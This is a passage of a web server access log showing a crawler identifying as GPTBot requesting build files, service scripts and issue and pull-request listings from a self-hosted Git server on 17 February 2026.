AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" +[17/Feb/2026:19:02:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11072] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:19:02:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11301] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:19:02:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 11323] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:19:02:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11158] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:19:02:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11074] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:19:02:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11148] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:19:02:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11158] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:19:02:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" +[17/Feb/2026:19:02:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" +[17/Feb/2026:19:02:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" +[17/Feb/2026:19:02:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" +[17/Feb/2026:19:02:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11073] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:19:02:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11160] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:19:02:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11149] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:19:02:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 11325] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:19:02:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:02:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:03:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11280] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:19:03:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:03:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10044] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:03:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:03:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11293] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:19:03:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastupdate&state=open&type=all" +[17/Feb/2026:19:03:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat?display=source" [Client 74.7.227.38] [Length 13617] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" +[17/Feb/2026:19:03:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat?display=rendered" [Client 74.7.227.38] [Length 11260] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" +[17/Feb/2026:19:03:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py?display=rendered" [Client 74.7.227.38] [Length 11262] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" +[17/Feb/2026:19:03:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec?display=rendered" [Client 74.7.227.38] [Length 11253] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" +[17/Feb/2026:19:03:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md?display=source" [Client 74.7.227.38] [Length 16062] [Gzip 4.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" +[17/Feb/2026:19:03:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:03:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10062] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:03:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:19:03:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10069] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:03:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:03:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:03:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10246] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:19:03:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:03:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:03:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10071] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:03:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:03:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:03:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10067] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:03:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:03:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:03:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10235] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:03:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10246] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:03:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:19:03:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10235] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:03:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:03:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:03:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10062] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:03:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:03:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like 